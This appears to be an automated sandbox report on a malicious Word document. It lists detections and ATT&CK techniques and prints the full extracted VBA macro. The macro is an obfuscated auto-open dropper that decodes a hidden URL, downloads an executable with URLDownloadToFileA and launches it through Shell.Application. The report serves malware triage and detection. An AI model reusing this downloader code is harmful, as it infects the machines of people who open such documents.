MALICIOUS
318
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros. The 'autoopen' macro is present and triggers the execution of other VBA code. Heuristics indicate the use of URLDownloadToFile, a common method for downloading and executing secondary payloads. The VBA code is heavily obfuscated, but the presence of the autoopen macro and the URLDownloadToFile API strongly suggests a downloader or dropper functionality.
Heuristics 10
-
ClamAV: Doc.Dropper.Agent-1640141 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-1640141
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
"URLDownloadToFileA" (ByVal UYG78t78GIUsfgd As LongPtr, _ -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set выпавпавуца = CreateObject(Chr$(83) & Chr$(104) & Chr$(101) & Chr$(108) & Chr$(108) & Chr$(46) & Chr$(65) & Chr$(112) & Chr$(112) & Chr$(108) & Chr$(105) & Chr$(99) & Chr$(97) & Chr$(116) & Chr$(105) & Chr$(111) & Chr$(110)) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
выпавпавуца.Open Environ(wUmMnysKtPzKQMYpELM(Chr$(84) & Chr$(57) & Chr$(77) & Chr$(104) & Chr$(80) & Chr$(38))) & wUmMnysKtPzKQMYpELM(Chr$(92) & Chr$(61) & Chr$(51) & Chr$(39) & Chr$(50) & Chr$(134) & Chr$(52) & Chr$(122) & Chr$(50) & Chr$(57) & Chr$(51) & Chr$(51) & Chr$(53) & Chr$(95) & Chr$(50) & Chr$(64) & Chr$(51) & Chr$(84) & Chr$(53) & Chr$(96) & Chr$(46) & Chr$(88) & Chr$(101) & Chr$(111) & Chr$(120) & Chr$(44) & Chr$(101) & Chr$(45)) -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9129 bytes |
SHA-256: 67695422934e0f361b98a792753df5960fd9013409c9ca6f4c4bd908484f2284 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
86 of 145 identifiers look randomly generated (e.g. 'NvYoUbuCYSSRQHAHMyORUMl') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
atqk_x482mp6v
End Sub
Attribute VB_Name = "Module1"
Public Function wUmMnysKtPzKQMYpELM(CLjPtJqwPYMso As String) As String
Dim nwwuzQelPc As Integer
For nwwuzQelPc = 0 To 0
If nwwuzQelPc = 5 Then End
Next nwwuzQelPc
Dim rUkQQqyoTO As Integer
For rUkQQqyoTO = 0 To 0
If rUkQQqyoTO = 5 Then End
Next rUkQQqyoTO
Dim jHzvHYnIwFd As Integer
For jHzvHYnIwFd = 0 To 0
If jHzvHYnIwFd = 5 Then End
Next jHzvHYnIwFd
For mrdVdHiTjnq = 1 To Len(CLjPtJqwPYMso) Step 2
Dim lvBxJabwy As Integer
For lvBxJabwy = 0 To 0
If lvBxJabwy = 5 Then End
Next lvBxJabwy
Dim DrdEbaB As Integer
For DrdEbaB = 0 To 0
If DrdEbaB = 5 Then End
Next DrdEbaB
Dim luGjCiFYkYOhfBlvBxJabw As Integer
For luGjCiFYkYOhfBlvBxJabw = 0 To 0
If luGjCiFYkYOhfBlvBxJabw = 5 Then End
Next luGjCiFYkYOhfBlvBxJabw
Dim CwOLiEd As Integer
For CwOLiEd = 0 To 0
If CwOLiEd = 5 Then End
Next CwOLiEd
Dim CiFYkY As Integer
For CiFYkY = 0 To 0
If CiFYkY = 5 Then End
Next CiFYkY
Dim jAmrQrCwO As Integer
For jAmrQrCwO = 0 To 0
If jAmrQrCwO = 5 Then End
Next jAmrQrCwO
wUmMnysKtPzKQMYpELM = wUmMnysKtPzKQMYpELM & Mid(CLjPtJqwPYMso, mrdVdHiTjnq, 1)
Dim dSVNmPusaOj As Integer
For dSVNmPusaOj = 0 To 0
If dSVNmPusaOj = 5 Then End
Next dSVNmPusaOj
Dim TjbLtvPsKVqDrdEb As Integer
For TjbLtvPsKVqDrdEb = 0 To 0
If TjbLtvPsKVqDrdEb = 5 Then End
Next TjbLtvPsKVqDrdEb
Dim eCgKvq As Integer
For eCgKvq = 0 To 0
If eCgKvq = 5 Then End
Next eCgKvq
Dim lAHJSqlOQxDQ As Integer
For lAHJSqlOQxDQ = 0 To 0
If lAHJSqlOQxDQ = 5 Then End
Next lAHJSqlOQxDQ
Dim aQtPotqBET As Integer
For aQtPotqBET = 0 To 0
If aQtPotqBET = 5 Then End
Next aQtPotqBET
Dim DziwVVw As Integer
For DziwVVw = 0 To 0
If DziwVVw = 5 Then End
Next DziwVVw
Next
Dim QRGbRI As Integer
For QRGbRI = 0 To 0
If QRGbRI = 5 Then End
Next QRGbRI
Dim YosvmLbSDlnI As Integer
For YosvmLbSDlnI = 0 To 0
If YosvmLbSDlnI = 5 Then End
Next YosvmLbSDlnI
Dim ETpqzJEix As Integer
For ETpqzJEix = 0 To 0
If ETpqzJEix = 5 Then End
Next ETpqzJEix
Dim MIUlAHJSql As Integer
For MIUlAHJSql = 0 To 0
If MIUlAHJSql = 5 Then End
Next MIUlAHJSql
Dim JgEwsEU As Integer
For JgEwsEU = 0 To 0
If JgEwsEU = 5 Then End
Next JgEwsEU
Dim SklGHRpVzP As Integer
For SklGHRpVzP = 0 To 0
If SklGHRpVzP = 5 Then End
Next SklGHRpVzP
End Function
Attribute VB_Name = "Module2"
Public Function CBGrxFVwvLB()
End Function
Private Sub ydbIxRHyMQFFstTpRlPo()
End Sub
Private Sub DxPMkTekgsI()
End Sub
Public Sub qNvYoU()
End Sub
Private Sub rYSSRQHAHmM()
End Sub
Public Function UMlOtdZNiZPdnV()
End Function
Public Sub QtFTBSEIj()
End Sub
Private Function geAVuAwILavxG()
End Function
Public Function EQrKEuajinYQYCPfildBQJuceybg()
End Function
Private Sub maLnJIkRjUZzalf()
End Sub
Private Function mLDzKcrMAJhcFH()
End Function
Public Sub VKqzAyDbhoSgfzBtSiaKsu()
End Sub
Private Function ifNbAAckxZtYwN()
End Function
Private Function TmUrb()
End Function
Public Function zQgnpyVQ()
End Function
Public Function jCKzf()
End Function
Attribute VB_Name = "dfsdfsdffdgdhbvdfe3"
#If VBA7 Then
Private Declare PtrSafe Function араваыва Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal UYG78t78GIUsfgd As LongPtr, _
ByVal UYG78t78GIUsfg As String, _
ByVal UYG78t78GIUsfgf As String, _
ByVal UYG78t78GIUsfgfd As Long, _
ByVal UYG78t78GIUsfgfds As LongPtr) As LongPtr
#Else
Private Declare Function араваыва Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal UYG78t78GIUsfgd As Long, _
ByVal UYG78t78GIUsfg As String, _
ByVal UYG78t78GIUsfgf As String, _
ByVal UYG78t78GIUsfgfd As Long, _
ByVal UYG78t78GIUsfgfds As Long) As Long
#End If
Function огшпгшщидав(z0ktwRXRQZl2qo0_ As String, ваываывпук As String) As Boolean
vJHKBJdfkgfg = араваыва(0&, z0ktwRXRQZl2qo0_, ваываывпук, 0&, 0&)
Set выпавпавуца = CreateObject(Chr$(83) & Chr$(104) & Chr$(101) & Chr$(108) & Chr$(108) & Chr$(46) & Chr$(65) & Chr$(112) & Chr$(112) & Chr$(108) & Chr$(105) & Chr$(99) & Chr$(97) & Chr$(116) & Chr$(105) & Chr$(111) & Chr$(110))
выпавпавуца.Open Environ(wUmMnysKtPzKQMYpELM(Chr$(84) & Chr$(57) & Chr$(77) & Chr$(104) & Chr$(80) & Chr$(38))) & wUmMnysKtPzKQMYpELM(Chr$(92) & Chr$(61) & Chr$(51) & Chr$(39) & Chr$(50) & Chr$(134) & Chr$(52) & Chr$(122) & Chr$(50) & Chr$(57) & Chr$(51) & Chr$(51) & Chr$(53) & Chr$(95) & Chr$(50) & Chr$(64) & Chr$(51) & Chr$(84) & Chr$(53) & Chr$(96) & Chr$(46) & Chr$(88) & Chr$(101) & Chr$(111) & Chr$(120) & Chr$(44) & Chr$(101) & Chr$(45))
End Function
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Function vzBtSi()
End Function
Public Sub uOrwJGpC()
End Sub
Private Sub LZAUzYpPqBv()
End Sub
Public Function DNTPcsHOQaxsVY()
End Function
Private Function mbGCC()
End Function
Public Sub xFVwvLBE()
End Sub
Public Function dbIxRHyMQF()
End Function
Private Sub TdpRlPoGR()
End Sub
Private Sub PMkTekgsIJ()
End Sub
Private Function NvYoUbuCYSSRQHAH()
End Function
Private Sub ORUMlOtdZN()
End Sub
Private Sub dnVVJvQtFTBSE()
End Sub
Attribute VB_Name = "Module3"
Attribute VB_Name = "Module4"
Public Function NiZPdnVVJvQtFTB()
End Function
Private Sub jQTNgeAVuAwI()
End Sub
Private Function xGQLpEQrK()
End Function
Private Function jkinY()
End Function
Private Sub POfildBQJuc()
End Sub
Public Function gtDZmLnJIk()
End Function
Public Sub ZzalfxuQmLDzKcr()
End Sub
Private Sub hcFHoHNVKqzA()
End Sub
Public Function hoSgf()
End Function
Public Function tSiaKsuOrwGpCccDLZAUzY()
End Function
Private Function BvNwTDNT()
End Function
Attribute VB_Name = "Module5"
Sub atqk_x482mp6v()
огшпгшщидав wUmMnysKtPzKQMYpELM("hltEt<p=::/C/'s4cAhal1a/gNh;a@u0f`e4ro.kdHe2/ZjGs5/PbdiCnB.*e*x^eo"), Environ(wUmMnysKtPzKQMYpELM("T9MhP&")) & wUmMnysKtPzKQMYpELM("\=3'2†4z29335_2@3T5`.Xeox,e-")
End Sub
Public Function ILavxGQLp()
End Function
Private Sub KEuajkin()
End Sub
Private Sub CPOfildBQJuceyb()
End Sub
Private Sub ZmaLnJIkRjU()
End Sub
Private Sub lfxuQ()
End Sub
Private Function zKcrMAJhcFH()
End Function
Public Function VKqzAyDbhoSgf()
End Function
Public Function tSiaKsuOrw()
End Function
Private Function CccDLZAU()
End Function
Private Function PqBvNwTD()
End Function
Public Sub csHOQaxsVYEKe()
End Sub
Public Function CCBGrxFVwvLB()
End Function
Public Sub ydbIxRHyMQFFstT()
End Sub
Public Function lPoGRGDxPMkTek()
End Function
Private Function JfhqNvYoUbuC()
End Function
Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function EQrKEuajinYQYCP()
End Function
Public Function ldBQJu()
End Function
Public Function bgtDZmaLnJ()
End Function
Public Sub jUZzalfxuQmLDz()
End Sub
Private Sub MAJhcFHo()
End Sub
Private Function KqzAyDbhoSgfvzB()
End Function
Public Sub aKsuOr()
End Sub
Private Function pCccDLZAUzYp()
End Function
Public Function vNwTDNTPcs()
End Function
Private Sub axsVYEKembGCCB()
End Sub
Private Function FVwvLBEwUy()
End Function
Private Function xRHyMQFFstTd()
End Function
Public Function PoGRGDx()
End Function
Private Sub TekgsIJ()
End Sub
Private Function NvYoUbuCYSSRQHAHMyORUMl()
End Function
Public Sub ZNiZPnVVJv()
End Sub
Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Function QFFstTdpRlPoG()
End Function
Private Sub xPMkTekgsIJ()
End Sub
Private Function NvYoUbuC()
End Function
Private Function SRQHAHmMyORUMl()
End Function
Private Function ZNiZP()
End Function
Public Function VJvQtFTBSEIjQTN()
End Function
Private Function VuAwILavxG()
End Function
Private Sub EQrKEuaj()
End Sub
Private Sub YQYCPOf()
End Sub
Private Sub BQJuc()
End Sub
Public Sub gtDZm()
End Sub
Public Sub JIkRjUZ()
End Sub
Private Function fxuQmLD()
End Function
Private Function rMAJh()
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.